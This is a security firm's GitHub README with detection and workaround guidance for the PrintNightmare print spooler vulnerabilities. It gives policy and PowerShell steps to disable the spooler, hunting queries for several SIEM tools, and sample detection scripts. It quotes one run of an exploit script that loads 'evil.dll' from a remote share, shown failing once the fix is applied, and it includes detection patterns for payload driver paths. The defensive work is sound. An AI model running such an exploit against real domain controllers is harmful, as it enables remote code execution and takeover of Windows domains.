

GitHub - LaresLLC/CVE-2021-1675: CVE-2021-1675 Detection Info
source link: https://github.com/LaresLLC/CVE-2021-1675

From Lares Labs: Detection & Remediation Information for CVE-2021-1675 & CVE-2021-34527
This repo contains an EVTX sample of the CVE-2021-1675 attack as well as a minimal Sysmon configuration file that can be used to generate the relevant telemetry.
Please note that these rules may be circumvented - please patch as appropriate and disable the printer spooler service on domain controllers.
Please test all recommended fixes before rolling them out to production, as these hardening changes may have unintended consequences. We've written up a blog post explaining the content of this repo and our findings: https://www.lares.com/blog/detection-and-mitigation-advice-for-printnightmare/
Workaround Fix
Unfortunately, the patch released by Microsoft does not fix the issue, so a workaround can be applied by disabling the Print Spooler service. Here's how to do it via both GPO and PowerShell.
Removal of Authenticated Users from Pre-Windows 2000 Compatible Access
Another fix/workaround, discovered by Dirk-jan, is to remove Authenticated Users from the Pre-Windows 2000 Compatible Access group.
Ensure the "Authenticated Users" group is not a member of the "Pre-Windows 2000 Compatible Access" group (by default, it is not a member in current Windows versions). As shown in the screenshot below, the group should have no members:
If in doubt as to how to do this, the following steps can be taken:
- Open "Active Directory Users and Computers" (available from various menus or run "dsa.msc").
- Expand the domain being reviewed in the left pane and select the "Builtin" container.
- Double-click on the "Pre-Windows 2000 Compatible Access" group in the right pane.
- Select the "Members" tab.
- If the "Anonymous Logon", "Authenticated Users" or "Everyone" groups are members, select each and click "Remove".
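The same membership check as the steps above, scripted as an added example (not code from the Lares repo). It assumes the RSAT ActiveDirectory module is installed and that the account running it can read the domain; the well-known SIDs are used so the check does not depend on display names, and the `-Server` default of the PDC emulator is an arbitrary choice.

```powershell
# Added example: audit "Pre-Windows 2000 Compatible Access" (well-known SID S-1-5-32-554)
# for the three principals the manual steps above say should not be members.
Import-Module ActiveDirectory

function Test-PreWin2000CompatibleAccess {
    param(
        # Any writable DC works; the PDC emulator is just a convenient default (assumption).
        [string]$Server = (Get-ADDomain).PDCEmulator
    )
    # Locale-independent identities of the principals to flag.
    $unwanted = @{
        'S-1-5-7'  = 'Anonymous Logon'
        'S-1-5-11' = 'Authenticated Users'
        'S-1-1-0'  = 'Everyone'
    }
    # Read the raw "member" attribute instead of Get-ADGroupMember: the well-known
    # principals are foreignSecurityPrincipal objects, which Get-ADGroupMember cannot always resolve.
    $group = Get-ADGroup -Identity 'S-1-5-32-554' -Server $Server -Properties member

    $findings = foreach ($dn in $group.member) {
        $obj = Get-ADObject -Identity $dn -Server $Server -Properties objectSid
        $sid = $obj.objectSid.Value
        if ($unwanted.ContainsKey($sid)) {
            [pscustomobject]@{ Member = $unwanted[$sid]; Sid = $sid; DistinguishedName = $dn }
        }
    }

    if ($findings) {
        Write-Warning "$($group.Name) still contains principals that should be removed (listed below)."
        # Remediation, once reviewed: Remove-ADGroupMember -Identity 'S-1-5-32-554' -Members <DistinguishedName>
    } else {
        Write-Host "$($group.Name) contains none of Anonymous Logon / Authenticated Users / Everyone." -ForegroundColor Green
    }
    $findings   # empty when the group is clean
}

Test-PreWin2000CompatibleAccess | Format-Table -AutoSize
```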
The following GPO can be set to deny client connections to the spooler, which is a potential workaround where disabling the spooler service altogether might not be an option. This has been tested against domain controllers and endpoints (W7/W10) in a lab environment: users can still add/remove printers and print, but it stops the exploit from working. Note: it is also understood that this GPO fixes CVE-2021-34527, as noted in Microsoft's vulnerability page.
Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections
set this to Disabled:
Then restart the spooler service on the affected host. All going well, the exploit will be denied access:
```
./CVE-2021-1675.py lares.labs/[email protected] '\\certer.lares.labs\share\evil.dll' 1 ⨯
Password:
[*] Try 1...
[*] Connecting to ncacn_np:192.168.1.157[\PIPE\spoolss]
[-] Connection Failed
```
PowerShell
Adapted 0gtweet's script to use Get-ADDomainController to pull all DCs from the domain.
```powershell
# This script STOPS and DISABLES the Print Spooler service (aka #PrintNightmare) on each
# domain controller IF ONLY DEFAULT PRINTERS EXIST.
# Revert if you need to: go to services.msc, find the "Print Spooler" service, change the
# startup type to "Automatic" and start the service.
# Source: https://github.com/gtworek/PSBits/blob/master/Misc/StopAndDisableDefaultSpoolers.ps1
#
# Requirements: RSAT (ActiveDirectory module). Get-Service/Set-Service -ComputerName
# need Windows PowerShell 5.1 (the parameter is not available in PowerShell 7).
# Get-Module -Name ActiveDirectory
# Import-Module -Name ActiveDirectory

# Enumerate every DC in the domain instead of a hard-coded list.
$computers = Get-ADDomainController -Filter * | ForEach-Object { $_.Name }

foreach ($computer in $computers) {
    Write-Host "Processing $computer ..."
    $service = Get-Service -ComputerName $computer -Name Spooler -ErrorAction SilentlyContinue
    if (!$service) {
        Write-Host "Cannot connect to Spooler Service on $computer. Skipping." -ForegroundColor Yellow
        continue
    }
    if ($service.Status -ne "Running") {
        Write-Host ("Service status is: """ + $service.Status + """. Skipping.") -ForegroundColor Yellow
        continue
    }
    # Any printer whose driver is not one of the two built-in defaults keeps the spooler running.
    $printers = (Get-WmiObject -Class Win32_Printer -ComputerName $computer)
    if (!$printers) {
        Write-Host "Cannot enumerate printers. Skipping." -ForegroundColor Yellow
        continue
    }
    $disableSpooler = $true
    foreach ($DriverName in ($printers.DriverName)) {
        if (($DriverName -notmatch 'Microsoft XPS Document Writer') -and ($DriverName -notmatch 'Microsoft Print To PDF')) {
            Write-Host " Printer found: $DriverName" -ForegroundColor Green
            $disableSpooler = $false
        }
    }
    if ($disableSpooler) {
        Write-Host "Only default printers found. Stopping and disabling spooler..." -ForegroundColor DarkCyan
        (Get-Service -ComputerName $computer -Name Spooler) | Stop-Service -Verbose
        Set-Service -ComputerName $computer -Name Spooler -StartupType Disabled -Verbose
    } else {
        Write-Host "Non-default printers found. Skipping." -ForegroundColor Green
    }
}
```
Sysmon Config File
The provided Sysmon configuration CVE-2021-1675.xml file can be installed with Sysmon Config Pusher: https://github.com/LaresLLC/SysmonConfigPusher
Splunk Query
```
index=sysmon Image="C:\\Windows\\System32\\spoolsv.exe" | stats values(ImageLoaded),values(TargetObject),values(Details),values(TargetFilename)
```
KQL Query for Sentinel / MDE via Olaf Hartong
```
let serverlist=DeviceInfo
| where DeviceType != "Workstation"
| distinct DeviceId;
let suspiciousdrivers=DeviceImageLoadEvents
| where DeviceId in (serverlist)
| where FolderPath startswith @"c:\windows\system32\spool\drivers"
| distinct SHA1
| invoke FileProfile(SHA1, 1000)
| where GlobalPrevalence < 50 and IsRootSignerMicrosoft != 1 and SignatureState != "SignedValid";
suspiciousdrivers
| join kind=inner (DeviceImageLoadEvents
| where DeviceId in (serverlist)
| where FolderPath startswith @"c:\windows\system32\spool\drivers") on SHA1
| where InitiatingProcessFileName != "ccmexec.exe"
```
Source: https://twitter.com/olafhartong/status/1410229699993874442
Zeek Observations
Tool Used: https://github.com/cisagov/Malcolm
File transfer of DLL:
NTLM Authentication from "Attacking" Machine:
Relevant RPC Calls:
Carbon Black Hunting Query for CVE-2021-1675
Source: https://github.com/mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery/blob/main/README.md
- 1 Based on the Sigma rule on detecting the POC code
```
filemod_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old\\1\\123
```
- 2 Based on the Sigma rule on detecting the POC code
```
(modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3* OR modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old*) AND parent_cmdline:spoolsv\.exe
```
- 3 Based on the Sigma rule on detecting the POC code
```
(modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3* OR modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old*) AND process_name:spoolsv\.exe
```
- 4 Detecting file events (unsigned), adjust this to your baseline. I did not specify the driver path on purpose here since the exploitation and post-exploitation are still a bit unclear. Make sure to adjust this to your baseline (known hash, etc).
```
process_name:spoolsv\.exe AND NOT filemod_publisher_state:FILE_SIGNATURE_STATE_SIGNED
```
- 5 Detecting file events (signed by non-MS), adjust this to your baseline
```
process_name:spoolsv\.exe AND filemod_publisher_state:FILE_SIGNATURE_STATE_SIGNED AND NOT filemod_publisher:"Microsoft Windows*"
```
Alternative approach
A generic way to hunt for Print Spooler exploitation is to look for the errors the spooler generates when it loads the payload DLL. This can be done either by looking for spoolsv.exe spawning WerFault.exe, or for Event ID 7031 reporting an unexpected termination of the Print Spooler service.
Splunk Query
```
((index=sysmon EventCode=1
ParentImage="C:\\Windows\\System32\\spoolsv.exe" Image="C:\\Windows\\System32\\WerFault.exe")
OR (index=windows Channel=System EventCode=7031
Message="The Print Spooler service terminated unexpectedly"))
```
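The logic of the Splunk, Carbon Black and WerFault/7031 queries above, as an added example (not from the Lares repo) run over constructed sample records in PowerShell. The records are shaped like Sysmon Event ID 7 (ImageLoaded) and Event ID 1 (ProcessCreate) plus a System log 7031 entry; hostnames, timestamps and the DLL name are made up for the example.

```powershell
# Added example: flag the three PrintNightmare indicators used by the queries above.
function Find-SpoolerExploitIndicator {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $reason = $null
        # 1. spoolsv.exe loading a driver DLL that is unsigned or not signed by Microsoft
        if ($e.Channel -eq 'Sysmon' -and $e.EventCode -eq 7 -and
            $e.Image -like '*\spoolsv.exe' -and
            $e.ImageLoaded -like 'C:\Windows\System32\spool\drivers\*' -and
            ($e.Signed -ne 'true' -or $e.Signature -notlike 'Microsoft*')) {
            $reason = "spoolsv.exe loaded a non-Microsoft driver DLL: $($e.ImageLoaded)"
        }
        # 2. spoolsv.exe spawning WerFault.exe (spooler crashed while loading the payload)
        elseif ($e.Channel -eq 'Sysmon' -and $e.EventCode -eq 1 -and
                $e.ParentImage -like '*\spoolsv.exe' -and $e.Image -like '*\WerFault.exe') {
            $reason = 'spoolsv.exe spawned WerFault.exe'
        }
        # 3. Service Control Manager event 7031 for the Print Spooler
        elseif ($e.Channel -eq 'System' -and $e.EventCode -eq 7031 -and
                $e.Message -like 'The Print Spooler service terminated unexpectedly*') {
            $reason = 'Print Spooler service terminated unexpectedly (event 7031)'
        }
        if ($reason) {
            [pscustomobject]@{ Host = $e.Host; Time = $e.Time; EventCode = $e.EventCode; Reason = $reason }
        }
    }
}

# Constructed sample telemetry (not real captures): one benign driver load, one suspicious one,
# the WerFault spawn, the 7031 entry, and an unrelated process creation on a workstation.
$sample = @(
    [pscustomobject]@{ Host='DC01'; Time='2021-07-01T10:00:01Z'; Channel='Sysmon'; EventCode=7
        Image='C:\Windows\System32\spoolsv.exe'; ImageLoaded='C:\Windows\System32\spool\drivers\x64\3\unidrv.dll'
        Signed='true'; Signature='Microsoft Windows' }
    [pscustomobject]@{ Host='DC01'; Time='2021-07-01T10:00:02Z'; Channel='Sysmon'; EventCode=7
        Image='C:\Windows\System32\spoolsv.exe'; ImageLoaded='C:\Windows\System32\spool\drivers\x64\3\old\1\evil.dll'
        Signed='false'; Signature='' }
    [pscustomobject]@{ Host='DC01'; Time='2021-07-01T10:00:03Z'; Channel='Sysmon'; EventCode=1
        ParentImage='C:\Windows\System32\spoolsv.exe'; Image='C:\Windows\System32\WerFault.exe' }
    [pscustomobject]@{ Host='DC01'; Time='2021-07-01T10:00:04Z'; Channel='System'; EventCode=7031
        Message='The Print Spooler service terminated unexpectedly. It has done this 1 time(s).' }
    [pscustomobject]@{ Host='WS07'; Time='2021-07-01T10:05:00Z'; Channel='Sysmon'; EventCode=1
        ParentImage='C:\Windows\explorer.exe'; Image='C:\Windows\System32\notepad.exe' }
)

Find-SpoolerExploitIndicator -Events $sample | Format-Table -AutoSize
```

Against a live host the same objects can be built from `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1,7}` and the System log, mapping the event XML data fields onto the property names used here.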
References
Domain Controller Versus Non-Domain Controller Observations via Benjamin Delpy:
Very handy flow chart via Stan Hegt of Outflank
New CVE Assignment from Microsoft:
SANS ICS Diary:
https://isc.sans.edu/forums/diary/CVE20211675+Incomplete+Patch+and+Leaked+RCE+Exploit/27588/